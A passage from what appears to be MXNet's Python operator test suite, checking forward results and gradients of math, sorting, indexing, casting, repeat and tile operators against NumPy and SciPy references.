assert_almost_equal(arr_grad, npout_grad)
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x._bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s._bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
def test_order():
ctx = default_context()
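# gt_topk builds the expected result with NumPy: the top/bottom k indices or values along
# `axis` (via argsort/sort with wrap-mode take), or a 0/1 mask marking the selected positions
# when ret_typ is neither "indices" nor "value".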
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b._simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
def test_take_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
@pytest.mark.parametrize('mode,out_of_range', [
('clip', True),
('wrap', True),
('raise', False)
])
@pytest.mark.parametrize('data_ndim', range(1, 5))
@pytest.mark.parametrize('idx_ndim', range(1, 4))
def test_take(mode, out_of_range, data_ndim, idx_ndim):
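# grad_helper accumulates 1.0 into grad_in at index `idx` along `axis`; summed over all
# indices it gives the expected take() gradient for an all-ones output gradient.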
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result._simple_bind(default_context(), a=data_shape,
indices=idx_shape)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0]
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est)
# check addto
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid._simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y._simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
assert exe.outputs[0].dtype == dsttype
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
exe.forward(is_train=True)
assert exe.outputs[0].dtype == np.float16
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z._bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z._bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
